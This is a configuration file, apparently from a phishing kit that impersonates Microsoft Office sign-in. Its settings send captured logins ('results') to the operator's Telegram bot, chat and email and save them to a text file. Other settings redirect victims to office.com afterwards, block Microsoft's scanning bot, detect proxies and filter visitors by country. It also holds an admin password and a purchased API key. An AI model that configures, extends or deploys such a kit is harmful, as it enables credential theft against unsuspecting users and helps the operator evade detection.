;Your bot token here
bot="1828790296"
;Your Chat Id here
chat="1193698958"
;Name You can change your name here
name="Greatness Boss"
;your admin panel password
password="abf95cb47f6e7501d98"
;your cloudfare sitekey here
sitekey="1x00000000000000000000AA"
;your cloudfare secret key here
secret_key="1x0000000000000000000000000000000AA"
;Your email for results here
email='';
;Your Redirect Url Here
finish="https://office.com/?auth=2"
;your whitelisted ip
ip = ""
;To send visits or not 1/0
send_visit="1"
;To use capctha 1/0
use_capctha="0"
;To block microsoft bot set to 1
block_bot="1"
;To detect proxy usaged set to 1
detect_proxy="0"
;To detect blacklisted ip set to 1
detect_blacklist="0"
;Accepted country codes
country_code=""
;Your file name to save your results
results_file="rets.txt"
;Your api key here,you can get one from @fisherstell
api="a1fa7e77e1202572f5d777caa9fffd72e7e410e639c528494f"